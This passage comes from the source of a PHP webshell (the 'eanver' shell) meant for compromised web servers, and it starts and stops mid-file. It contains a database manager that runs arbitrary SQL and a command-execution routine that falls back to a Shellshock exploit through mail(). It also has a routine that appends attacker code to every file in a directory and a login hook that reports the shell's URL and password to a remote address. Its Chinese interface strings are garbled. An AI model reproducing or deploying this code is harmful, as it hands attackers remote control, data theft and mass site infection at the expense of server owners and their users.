style="width:80px;"><br><br><br>\r\n{$tip}<br><br><br></form></div>\r\nEND;\r\n//}\r\nbreak;\r\n\r\n\r\n\r\n\r\n\r\ncase "mysql_msg":\r\n\t$conn = @mysql_connect($_COOKIE[\'m_eanverhost\'].\':\'.$_COOKIE[\'m_eanverport\'],$_COOKIE[\'m_eanveruser\'],$_COOKIE[\'m_eanverpass\']);\r\n\tif($conn)\r\n\t{\r\nprint<<<END\r\n<script language="javascript">\r\nfunction Delok(msg,gourl)\r\n{\r\n\tsmsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";\r\n\tif(confirm(smsg)){window.location = gourl;}\r\n}\r\nfunction Createok(ac)\r\n{\r\n\tif(ac == \'a\') document.getElementById(\'nsql\').value = \'CREATE TABLE name (eanver BLOB);\';\r\n\tif(ac == \'b\') document.getElementById(\'nsql\').value = \'CREATE DATABASE name;\';\r\n\tif(ac == \'c\') document.getElementById(\'nsql\').value = \'DROP DATABASE name;\';\r\n\treturn false;\r\n}\r\n</script>\r\nEND;\r\n\t\t$BOOL = false;\r\n\t\t$MSG_BOX = \'�û�:\'.$_COOKIE[\'m_eanveruser\'].\' &nbsp;&nbsp;&nbsp;&nbsp; ��ַ:\'.$_COOKIE[\'m_eanverhost\'].\':\'.$_COOKIE[\'m_eanverport\'].\' &nbsp;&nbsp;&nbsp;&nbsp; �汾:\';\r\n\t\t$k = 0;\r\n\t\t$result = @mysql_query(\'select version();\',$conn);\r\n\t\twhile($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}\r\n\t\techo \'<div class="actall"> ��ݿ�:\';\r\n\t\t$result = mysql_query("SHOW DATABASES",$conn);\r\n\t\twhile($db = mysql_fetch_array($result)){echo \'&nbsp;&nbsp;[<a href="?eanver=mysql_msg&db=\'.$db[\'Database\'].\'">\'.$db[\'Database\'].\'</a>]\';}\r\n\t\techo \'</div>\';\r\n\t\tif(isset($_GET[\'db\']))\r\n\t\t{\r\n\t\t\tmysql_select_db($_GET[\'db\'],$conn);\r\n\t\t\tif(!empty($_POST[\'nsql\'])){$BOOL = true; $MSG_BOX = mysql_query($_POST[\'nsql\'],$conn) ? \'ִ�гɹ�\' : \'ִ��ʧ�� \'.mysql_error();}\r\n\t\t\tif(is_array($_POST[\'insql\']))\r\n\t\t\t{\r\n\t\t\t\t$query = \'INSERT INTO \'.$_GET[\'table\'].\' (\';\r\n\t\t\t\tforeach($_POST[\'insql\'] as $var => $key)\r\n\t\t\t\t{\r\n\t\t\t\t\t$querya .= $var.\',\';\r\n\t\t\t\t\t$queryb .= \'\\\'\'.addslashes($key).\'\\\',\';\r\n\t\t\t\t}\r\n\t\t\t\t$query = $query.substr($querya, 0, -1).\') VALUES (\'.substr($queryb, 0, -1).\');\';\r\n\t\t\t\t$MSG_BOX = mysql_query($query,$conn) ? \'��ӳɹ�\' : \'���ʧ�� \'.mysql_error();\r\n\t\t\t}\r\n\t\t\tif(is_array($_POST[\'upsql\']))\r\n\t\t\t{\r\n\t\t\t\t$query = \'UPDATE \'.$_GET[\'table\'].\' SET \';\r\n\t\t\t\tforeach($_POST[\'upsql\'] as $var => $key)\r\n\t\t\t\t{\r\n\t\t\t\t\t$queryb .= $var.\'=\\\'\'.addslashes($key).\'\\\',\';\r\n\t\t\t\t}\r\n\t\t\t\t$query = $query.substr($queryb, 0, -1).\' \'.base64_decode($_POST[\'wherevar\']).\';\';\r\n\t\t\t\t$MSG_BOX = mysql_query($query,$conn) ? \'�޸ijɹ�\' : \'�޸�ʧ�� \'.mysql_error();\r\n\t\t\t}\r\n\t\t\tif(isset($_GET[\'del\']))\r\n\t\t\t{\r\n\t\t\t\t$result = mysql_query(\'SELECT * FROM \'.$_GET[\'table\'].\' LIMIT \'.$_GET[\'del\'].\', 1;\',$conn);\r\n\t\t\t\t$good = mysql_fetch_assoc($result);\r\n\t\t\t\t$query = \'DELETE FROM \'.$_GET[\'table\'].\' WHERE \';\r\n\t\t\t\tforeach($good as $var => $key){$queryc .= $var.\'=\\\'\'.addslashes($key).\'\\\' AND \';}\r\n\t\t\t\t$where = $query.substr($queryc, 0, -4).\';\';\r\n\t\t\t\t$MSG_BOX = mysql_query($where,$conn) ? \'ɾ���ɹ�\' : \'ɾ��ʧ�� \'.mysql_error();\r\n\t\t\t}\r\n\t\t\t$action = \'?eanver=mysql_msg&db=\'.$_GET[\'db\'];\r\n\t\t\tif(isset($_GET[\'drop\'])){$query = \'Drop TABLE IF EXISTS \'.$_GET[\'drop\'].\';\';$MSG_BOX = mysql_query($query,$conn) ? \'ɾ���ɹ�\' : \'ɾ��ʧ�� \'.mysql_error();}\r\n\t\t\tif(isset($_GET[\'table\'])){$action .= \'&table=\'.$_GET[\'table\'];if(isset($_GET[\'edit\'])) $action .= \'&edit=\'.$_GET[\'edit\'];}\r\n\t\t\tif(isset($_GET[\'insert\'])) $action .= \'&insert=\'.$_GET[\'insert\'];\r\n\t\t\techo \'<div class="actall"><form method="POST" action="\'.$action.\'">\';\r\n\t\t\techo \'<textarea name="nsql" id="nsql" style="width:500px;height:50px;">\'.$_POST[\'nsql\'].\'</textarea> \';\r\n\t\t\techo \'<input type="submit" name="querysql" value="ִ��" style="width:60px;height:49px;"> \';\r\n\t\t\techo \'<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\\\'a\\\')"> \';\r\n\t\t\techo \'<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\\\'b\\\')"> \';\r\n\t\t\techo \'<input type="button" value="ɾ����" style="width:60px;height:49px;" onclick="Createok(\\\'c\\\')"></form></div>\';\r\n\t\t\techo \'<div class="msgbox" style="height:40px;">\'.$MSG_BOX.\'</div><div class="actall"><a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'">\'.$_GET[\'db\'].\'</a> ---> \';\r\n\t\t\tif(isset($_GET[\'table\']))\r\n\t\t\t{\r\n\t\t\t\techo \'<a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$_GET[\'table\'].\'">\'.$_GET[\'table\'].\'</a> \';\r\n\t\t\t\techo \'[<a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&insert=\'.$_GET[\'table\'].\'">����</a>]</div>\';\r\n\t\t\t\tif(isset($_GET[\'edit\']))\r\n\t\t\t\t{\r\n\t\t\t\t\tif(isset($_GET[\'p\'])) $atable = $_GET[\'table\'].\'&p=\'.$_GET[\'p\']; else $atable = $_GET[\'table\'];\r\n\t\t\t\t\techo \'<form method="POST" action="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$atable.\'">\';\r\n\t\t\t\t\t$result = mysql_query(\'SELECT * FROM \'.$_GET[\'table\'].\' LIMIT \'.$_GET[\'edit\'].\', 1;\',$conn);\r\n\t\t\t\t\t$good = mysql_fetch_assoc($result);\r\n\t\t\t\t\t$u = 0;\r\n\t\t\t\t\tforeach($good as $var => $key)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$queryc .= $var.\'=\\\'\'.$key.\'\\\' AND \';\r\n\t\t\t\t\t\t$type = @mysql_field_type($result, $u);\r\n\t\t\t\t\t\t$len = @mysql_field_len($result, $u);\r\n\t\t\t\t\t\techo \'<div class="actall">\'.$var.\' <font color="#FF0000">\'.$type.\'(\'.$len.\')</font><br><textarea name="upsql[\'.$var.\']" style="width:600px;height:60px;">\'.htmlspecialchars($key).\'</textarea></div>\';\r\n\t\t\t\t\t\t$u++;\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$where = \'WHERE \'.substr($queryc, 0, -4);\r\n\t\t\t\t\techo \'<input type="hidden" id="wherevar" name="wherevar" value="\'.base64_encode($where).\'">\';\r\n\t\t\t\t\techo \'<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>\';\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t$query = \'SHOW COLUMNS FROM \'.$_GET[\'table\'];\r\n\t\t      $result = mysql_query($query,$conn);\r\n\t\t      $fields = array();\r\n\t\t\t  $pagesize=20;\r\n\t\t      $row_num = mysql_num_rows(mysql_query(\'SELECT * FROM \'.$_GET[\'table\'],$conn));\r\n\t\t\t  $numrows=$row_num;\r\n              $pages=intval($numrows/$pagesize);\r\n              if ($numrows%$pagesize) $pages++;\r\n              $offset=$pagesize*($page - 1);\r\n              $page=$_GET[\'p\'];\r\n              if(!$page) $page=1;\r\n\r\n\t\t      if(!isset($_GET[\'p\'])){$p = 0;$_GET[\'p\'] = 1;} else $p = ((int)$_GET[\'p\']-1)*20;\r\n\t\t\t\t\techo \'<table border="0"><tr>\';\r\n\t\t\t\t\techo \'<td class="toptd" style="width:70px;" nowrap>���</td>\';\r\n\t\t\t\t\twhile($row = @mysql_fetch_assoc($result))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tarray_push($fields,$row[\'Field\']);\r\n\t\t\t\t\t\techo \'<td class="toptd" nowrap>\'.$row[\'Field\'].\'</td>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo \'</tr>\';\r\n\t\t\t\t\tif(eregi(\'WHERE|LIMIT\',$_POST[\'nsql\']) && eregi(\'SELECT|FROM\',$_POST[\'nsql\'])) $query = $_POST[\'nsql\']; else $query = \'SELECT * FROM \'.$_GET[\'table\'].\' LIMIT \'.$p.\', 20;\';\r\n\t\t\t\t\t$result = mysql_query($query,$conn);\r\n\t\t\t\t\t$v = $p;\r\n\t\t\t\t\twhile($text = @mysql_fetch_assoc($result))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\techo \'<tr><td><a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$_GET[\'table\'].\'&p=\'.$_GET[\'p\'].\'&edit=\'.$v.\'"> �޸� </a> \';\r\n\t\t\t\t\t\techo \'<a href="#" onclick="Delok(\\\'�\\\',\\\'?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$_GET[\'table\'].\'&p=\'.$_GET[\'p\'].\'&del=\'.$v.\'\\\');return false;"> ɾ�� </a></td>\';\r\n\t\t\t\t\t\tforeach($fields as $row){echo \'<td>\'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).\'</td>\';}\r\n\t\t\t\t\t\techo \'</tr>\'."\\r\\n";$v++;\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo \'</table><div class="actall">\';\r\n                    $pagep=$page-1;\r\n                    $pagen=$page+1;\r\n                    echo "���� ".$row_num." ���¼ ";\r\n                    if($pagep>0) $pagenav.="  <a href=\'?eanver=mysql_msg&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."&p=1&charset=".$_GET[\'charset\']."\'>��ҳ</a> <a href=\'?eanver=mysql_msg&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."&p=".$pagep."&charset=".$_GET[\'charset\']."\'>��һҳ</a> "; else $pagenav.=" ��һҳ ";\r\n                    if($pagen<=$pages) $pagenav.=" <a href=\'?eanver=mysql_msg&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."&p=".$pagen."&charset=".$_GET[\'charset\']."\'>��һҳ</a> <a href=\'?eanver=mysql_msg&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."&p=".$pages."&charset=".$_GET[\'charset\']."\'>βҳ</a>"; else $pagenav.=" ��һҳ ";\r\n                    $pagenav.=" �� [".$page."/".$pages."] ҳ   ���<input name=\'textfield\' type=\'text\' style=\'text-align:center;\' size=\'4\' value=\'".$page."\' onkeydown=\\"if(event.keyCode==13)self.location.href=\'?eanver=mysql_msg&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."&p=\'+this.value+\'&charset=".$_GET[\'charset\']."\';\\" />ҳ";\r\n                    echo $pagenav;\r\n\t\t\t\t\techo \'</div>\';\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telseif(isset($_GET[\'insert\']))\r\n\t\t\t{\r\n\t\t\t\techo \'<a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$_GET[\'insert\'].\'">\'.$_GET[\'insert\'].\'</a></div>\';\r\n\t\t\t\t$result = mysql_query(\'SELECT * FROM \'.$_GET[\'insert\'],$conn);\r\n\t\t\t\t$fieldnum = @mysql_num_fields($result);\r\n\t\t\t\techo \'<form method="POST" action="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$_GET[\'insert\'].\'">\';\r\n\t\t\t\tfor($i = 0;$i < $fieldnum;$i++)\r\n\t\t\t\t{\r\n\t\t\t\t\t$name = @mysql_field_name($result, $i);\r\n\t\t\t\t\t$type = @mysql_field_type($result, $i);\r\n\t\t\t\t\t$len = @mysql_field_len($result, $i);\r\n\t\t\t\t\techo \'<div class="actall">\'.$name.\' <font color="#FF0000">\'.$type.\'(\'.$len.\')</font><br><textarea name="insql[\'.$name.\']" style="width:600px;height:60px;"></textarea></div>\';\r\n\t\t\t\t}\r\n\t\t\t\techo \'<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>\';\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$query = \'SHOW TABLE STATUS\';\r\n\t\t\t\t$status = @mysql_query($query,$conn);\r\n\t\t\t\twhile($statu = @mysql_fetch_array($status))\r\n\t\t\t\t{\r\n\t\t\t\t\t$statusize[] = $statu[\'Data_length\'];\r\n\t\t\t\t\t$statucoll[] = $statu[\'Collation\'];\r\n\t\t\t\t}\r\n\t\t\t\t$query = \'SHOW TABLES FROM \'.$_GET[\'db\'].\';\';\r\n\t\t\t\techo \'</div><table border="0"><tr>\';\r\n\t\t\t\techo \'<td class="toptd" style="width:550px;"> ��� </td>\';\r\n\t\t\t\techo \'<td class="toptd" style="width:80px;"> ��� </td>\';\r\n\t\t\t\techo \'<td class="toptd" style="width:130px;"> �ַ��� </td>\';\r\n\t\t\t\techo \'<td class="toptd" style="width:70px;"> ��С </td></tr>\';\r\n\t\t\t\t$result = @mysql_query($query,$conn);\r\n\t\t\t\t$k = 0;\r\n\t\t\t\twhile($table = mysql_fetch_row($result))\r\n\t\t\t\t{\r\n\t\t\t\t\t$charset=substr($statucoll[$k],0,strpos($statucoll[$k],\'_\'));\r\n\t\t\t\t\techo \'<tr><td><a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$table[0].\'">\'.$table[0].\'</a></td>\';\r\n\t\t\t\t\techo \'<td><a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&insert=\'.$table[0].\'"> ���� </a> <a href="#" onclick="Delok(\\\'\'.$table[0].\'\\\',\\\'?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&drop=\'.$table[0].\'\\\');return false;"> ɾ�� </a></td>\';\r\n\t\t\t\t\techo \'<td>\'.$statucoll[$k].\'</td><td align="right">\'.File_Size($statusize[$k]).\'</td></tr>\'."\\r\\n";\r\n\t\t\t\t\t$k++;\r\n\t\t\t\t}\r\n\t\t\t\techo \'</table>\';\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\telse die(\'����MYSQLʧ��,�����µ�½.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">\');\r\n\tif(!$BOOL and addslashes($query)!=\'\') echo \'<script type="text/javascript">document.getElementById(\\\'nsql\\\').value = \\\'\'.addslashes($query).\'\\\';</script>\';\r\nbreak;\r\n\r\n\t\r\n\tdefault: html_main($path,$shellname); break;\r\n}\r\ncss_foot();\r\n/*---doing---*/\r\n\r\nfunction do_write($file,$t,$text)\r\n{\r\n\t$key = true;\r\n\t$handle = @fopen($file,$t);\r\n\tif(!@fwrite($handle,$text))\r\n\t{\r\n\t\t@chmod($file,0666);\r\n\t\t$key = @fwrite($handle,$text) ? true : false;\r\n\t}\r\n\t@fclose($handle);\r\n\treturn $key;\r\n}\r\n\r\nfunction do_show($filepath){\r\n\t$show = array();\r\n\t$dir = dir($filepath);\r\n\twhile($file = $dir->read()){\r\n\t\tif($file == \'.\' or $file == \'..\') continue;\r\n\t\t$files = str_path($filepath.\'/\'.$file);\r\n\t\t$show[] = $files;\r\n\t}\r\n\t$dir->close();\r\n\treturn $show;\r\n}\r\n\r\nfunction do_deltree($deldir){\r\n\t$showfile = do_show($deldir);\r\n\tforeach($showfile as $del){\r\n\t\tif(is_dir($del)){ \r\n\t\t\tif(!do_deltree($del)) return false;\r\n\t\t}elseif(!is_dir($del)){\r\n\t\t\t@chmod($del,0777);\r\n\t\t\tif(!@unlink($del)) return false;\r\n\t\t}\r\n\t}\r\n\t@chmod($deldir,0777);\r\n\tif(!@rmdir($deldir)) return false;\r\n\treturn true;\r\n}\r\n\r\nfunction do_showsql($query,$conn){\r\n\t$result = @mysql_query($query,$conn);\r\n\thtml_n(\'<br><br><textarea cols="70" rows="15">\');\r\n\twhile($row = @mysql_fetch_array($result)){\r\n\t\tfor($i=0;$i < @mysql_num_fields($result);$i++){\r\n\t\t\thtml_n(htmlspecialchars($row[$i]));\r\n\t\t}\r\n\t}\r\n\thtml_n(\'</textarea>\');\r\n}\r\n\r\nfunction hmlogin($xiao=1){\r\n$serveru = $_SERVER [\'HTTP_HOST\'].$_SERVER[\'PHP_SELF\'];\r\n$serverp = envlpass;\r\nif (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE[\'serveru\'] and $serverp==$_COOKIE[\'serverp\'])) {echo "<meta http-equiv=\'refresh\' content=\'0;URL=?\'>";} else {setcookie(\'serveru\',$serveru);setcookie(\'serverp\',$serverp);if($xiao==1){echo "<script src=\'?login=geturl\'></script><meta http-equiv=\'refresh\' content=\'0;URL=?\'>";}else{geturl();}}\r\n}\r\n\r\nfunction do_down($fd){\r\n\tif(!@file_exists($fd)) msg(\'�����ļ�������\');\r\n\t$fileinfo = pathinfo($fd);\r\n\theader(\'Content-type: application/x-\'.$fileinfo[\'extension\']);\r\n\theader(\'Content-Disposition: attachment; filename=\'.$fileinfo[\'basename\']);\r\n\theader(\'Content-Length: \'.filesize($fd));\r\n\t@readfile($fd);\r\n\texit;\r\n}\r\n\r\nfunction do_download($filecode,$file){\r\n\theader("Content-type: application/unknown");\r\n\theader(\'Accept-Ranges: bytes\');\r\n\theader("Content-length: ".strlen($filecode));\r\n\theader("Content-disposition: attachment; filename=".$file.";");\r\n\techo $filecode;\r\n\texit;\r\n}\r\n\r\nfunction TestUtf8($text)\r\n{if(strlen($text) < 3) return false;\r\n$lastch = 0;\r\n$begin = 0;\r\n$BOM = true;\r\n$BOMchs = array(0xEF, 0xBB, 0xBF);\r\n$good = 0;\r\n$bad = 0;\r\n$notAscii = 0;\r\nfor($i=0; $i < strlen($text); $i++)\r\n{$ch = ord($text[$i]);\r\nif($begin < 3)\r\n{ $BOM = ($BOMchs[$begin]==$ch);\r\n$begin += 1;\r\ncontinue; }\r\nif($begin==4 && $BOM) break;\r\nif($ch >= 0x80 ) $notAscii++;\r\nif( ($ch&0xC0) == 0x80 )\r\n{if( ($lastch&0xC0) == 0xC0 )\r\n{$good += 1;}\r\nelse if( ($lastch&0x80) == 0 )\r\n{$bad += 1; }}\r\nelse if( ($lastch&0xC0) == 0xC0 )\r\n{$bad += 1;}\r\n$lastch = $ch;}\r\nif($begin == 4 && $BOM)\r\n{return 2;}\r\nelse if($notAscii==0)\r\n{return 1;}\r\nelse if ($good >= $bad )\r\n{return 2;}\r\nelse\r\n{return 0;}}\r\n\r\nfunction File_Str($string)\r\n{\r\n\treturn str_replace(\'//\',\'/\',str_replace(\'\\\\\',\'/\',$string));\r\n}\r\n\r\nfunction File_Write($filename,$filecode,$filemode)\r\n{\r\n\t$key = true;\r\n\t$handle = @fopen($filename,$filemode);\r\n\tif(!@fwrite($handle,$filecode))\r\n\t{\r\n\t\t@chmod($filename,0666);\r\n\t\t$key = @fwrite($handle,$filecode) ? true : false;\r\n\t}\r\n\t@fclose($handle);\r\n\treturn $key;\r\n}\r\n\r\nfunction Exec_Run($cmd)\r\n{\r\n\t$res = \'\';\r\n\tif(function_exists(\'exec\')){@exec($cmd,$res);$res = join("\\n",$res);}\r\n\telseif(function_exists(\'shell_exec\')){$res = @shell_exec($cmd);}\r\n\telseif(function_exists(\'system\')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}\r\n\telseif(function_exists(\'passthru\')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}\r\n\telseif(@is_resource($f=@popen($cmd,\'r\'))){$res = \'\';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}\r\n\telseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists(\'COM\')){$w=new COM(\'WScript.shell\');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();}\r\n\telseif(function_exists(\'proc_open\')){$length = strcspn($cmd," \\t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array(\'pipe\', \'w\'),2 => array(\'pipe\', \'w\')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, \'UTF-8\');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, \'UTF-8\');}fclose($io[1]);fclose($io[2]);proc_close($p);}\r\n\telseif(function_exists(\'mail\')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("a@127.0.0.1","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";}\r\n\treturn $res;\r\n}\r\n\r\nif(isset($_GET[\'login\'])==\'geturl\'){\r\n    @set_time_limit(10);\r\n\t$serveru = $_SERVER [\'HTTP_HOST\'].$_SERVER[\'PHP_SELF\'];\r\n    $serverp = envlpass;\r\n    $copyurl = base64_decode("");\r\n    $url=$copyurl.$serveru.\'&pass=\'.$serverp;\r\n    $url=urldecode($url);\r\n    GetHtml($url);\r\n}\r\n\r\nfunction File_Mode()\r\n{\r\n\t$RealPath = realpath(\'./\');\r\n\t$SelfPath = $_SERVER[\'PHP_SELF\'];\r\n\t$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,\'/\'));\r\n\treturn File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));\r\n}\r\n\r\nfunction File_Size($size)\r\n{ \r\n        $kb = 1024;         // Kilobyte\r\n        $mb = 1024 * $kb;   // Megabyte\r\n        $gb = 1024 * $mb;   // Gigabyte\r\n        $tb = 1024 * $gb;   // Terabyte\r\n        if($size < $kb)\r\n        {\r\n            return $size." B";\r\n        }\r\n        else if($size < $mb)\r\n        { \r\n            return round($size/$kb,2)." K";\r\n        }\r\n        else if($size < $gb)\r\n        { \r\n            return round($size/$mb,2)." M";\r\n        }\r\n        else if($size < $tb)\r\n        { \r\n            return round($size/$gb,2)." G";\r\n        }\r\n        else\r\n        { \r\n            return round($size/$tb,2)." T";\r\n        }\r\n }\r\n\r\nfunction File_Read($filename)\r\n{\r\n\t$handle = @fopen($filename,"rb");\r\n\t$filecode = @fread($handle,@filesize($filename));\r\n\t@fclose($handle);\r\n\treturn $filecode;\r\n}\r\n\r\nfunction do_phpfun($cmd,$fun) {\r\n\t$res = \'\';\r\n\tswitch($fun){\r\n\t\tcase "exec": @exec($cmd,$res); $res = join("\\n",$res); break;\r\n\t\tcase "shell_exec": $res = @shell_exec($cmd); break;\r\n\t\tcase "system": @ob_start();\t@system($cmd); $res = @ob_get_contents();\t@ob_end_clean();break;\r\n\t\tcase "passthru": @ob_start();\t@passthru($cmd); $res = @ob_get_contents();\t@ob_end_clean();break;\r\n\t\tcase "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f))\t$res .= @fread($f,1024);} @pclose($f);break;\r\n\t}\r\n\treturn $res;\r\n}\r\n\r\nfunction do_passreturn($dir,$code,$type,$bool,$filetype = \'\',$shell = my_shell){\r\n\t$show = do_show($dir);\r\n\tforeach($show as $files){\r\n\t\tif(is_dir($files) && $bool){\r\n\t\t\tdo_passreturn($files,$code,$type,$bool,$filetype,$shell);\r\n\t\t}else{\r\n\t\t\tif($files == $shell) continue;\r\n\t\t\tswitch($type){\r\n\t\t\t\tcase "guama":\r\n\t\t\t\tif(debug($files,$filetype)){\r\n\t\t\t\t\tdo_write($files,"ab","\\n".$code) ? html_n("�ɹ�--> $files<br>") : html_n("ʧ��--> $files<br>");\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "qingma":\r\n\t\t\t\t$filecode = @file_get_contents($files);\r\n\t\t\t\tif(stristr($filecode,$code)){\r\n\t\t\t\t\t$newcode = str_replace($code,\'\',$filecode);\r\n\t\t\t\t\tdo_write($files,"wb",$newcode) ? html_n("�ɹ�--> $files<br>") : html_n("ʧ��--> $files<br>");\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "tihuan":\r\n\t\t\t\t$filecode = @file_get_contents($files);\r\n\t\t\t\tif(stristr($filecode,$code)){\r\n\t\t\t\t\t$newcode = str_replace($code,$filetype,$filecode);\r\n\t\t\t\t\tdo_write($files,"wb",$newcode) ? html_n("�ɹ�--> $files<br>") : html_n("ʧ��--> $files<br>");\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "scanfile":\r\n\t\t\t\t$file = explode(\'/\',$files);\r\n\t\t\t\tif(stristr($file[count($file)-1],$code)){\r\n\t\t\t\t\thtml_a("?eanver=editr&p=$files",$files);\r\n\t\t\t\t\techo \'<br>\';\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "scancode":\r\n\t\t\t\t$filecode = @file_get_contents($files);\r\n\t\t\t\tif(stristr($filecode,$code)){\r\n\t\t\t\t\thtml_a("?eanver=editr&p=$files",$files);\r\n\t\t\t\t\techo \'<br>\';\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "scanphp":\r\n\t\t\t\t$fileinfo = pathinfo($files);\r\n\t\t\t\tif($fileinfo[\'extension\'] == $code){\r\n\t\t\t\t\t$filecode = @file_get_contents($files);\r\n\t\t\t\t\tif(muma($filecode,$code)){\r\n\t\t\t\t\t\thtml_a("?eanver=editr&p=".urlencode($files),"�༭");\r\n\t\t\t\t\t\thtml_a("?eanver=del&p=".urlencode($files),"ɾ��");\r\n\t\t\t\t\t\techo $files.\'<br>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\r\n\r\nclass PHPzip{\r\n\r\n\tvar $file_count = 0 ;\r\n\tvar $datastr_len   = 0;\r\n\tvar $dirstr_len = 0;\r\n\tvar $filedata = \'\';\r\n\tvar $gzfilename;\r\n\tvar $fp;\r\n\tvar $dirstr=\'\';\r\n\r\n    function unix2DosTime($unixtime = 0) {\r\n        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);\r\n\r\n        if ($timearray[\'year\'] < 1980) {\r\n        \t$timearray[\'year\']    = 1980;\r\n        \t$timearray[\'mon\']     = 1;\r\n        \t$timearray[\'mday\']    = 1;\r\n        \t$timearray[\'hours\']   = 0;\r\n        \t$timearray[\'minutes\'] = 0;\r\n        \t$timearray[\'seconds\'] = 0;\r\n        }\r\n\r\n        return (($timearray[\'year\'] - 1980) << 25) | ($timearray[\'mon\'] << 21) | ($timearray[\'mday\'] << 16) |\r\n               ($timearray[\'hours\'] << 11) | ($timearray[\'minutes\'] << 5) | ($timearray[\'seconds\'] >> 1);\r\n    }\r\n\r\n\tfunction startfile($path = \'QQqun555227.zip\'){\r\n\t\t$this->gzfilename=$path;\r\n\t\t$mypathdir=array();\r\n\t\tdo{\r\n\t\t\t$mypathdir[] = $path = dirname($path);\r\n\t\t}while($path != \'.\');\r\n\t\t@end($mypathdir);\r\n\t\tdo{\r\n\t\t\t$path = @current($mypathdir);\r\n\t\t\t@mkdir($path);\r\n\t\t}while(@prev($mypathdir));\r\n\r\n\t\tif($this->fp=@fopen($this->gzfilename,"w")){\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\treturn false;\r\n\t}\r\n\r\n    function addfile($data, $name){\r\n        $name     = str_replace(\'\\\\\', \'/\', $name);\r\n\t\t\r\n\t\tif(strrchr($name,\'/\')==\'/\') return $this->adddir($name);\r\n\t\t\r\n        $dtime    = dechex($this->unix2DosTime());\r\n        $hexdtime = \'\\x\' . $dtime[6] . $dtime[7]\r\n                  . \'\\x\' . $dtime[4] . $dtime[5]\r\n                  . \'\\x\' . $dtime[2] . $dtime[3]\r\n                  . \'\\x\' . $dtime[0] . $dtime[1];\r\n        eval(\'$hexdtime = "\' . $hexdtime . \'";\');\r\n\r\n        $unc_len = strlen($data);\r\n        $crc     = crc32($data);\r\n        $zdata   = gzcompress($data);\r\n        $c_len   = strlen($zdata);\r\n        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);\r\n\t\t\r\n        $datastr  = "\\x50\\x4b\\x03\\x04";\r\n        $datastr .= "\\x14\\x00"; \r\n        $datastr .= "\\x00\\x00";\r\n        $datastr .= "\\x08\\x00"; \r\n        $datastr .= $hexdtime; \r\n        $datastr .= pack(\'V\', $crc);\r\n        $datastr .= pack(\'V\', $c_len);\r\n        $datastr .= pack(\'V\', $unc_len);\r\n        $datastr .= pack(\'v\', strlen($name));\r\n        $datastr .= pack(\'v\', 0); \r\n        $datastr .= $name;\r\n        $datastr .= $zdata;\r\n        $datastr .= pack(\'V\', $crc); \r\n        $datastr .= pack(\'V\', $c_len);\r\n        $datastr .= pack(\'V\', 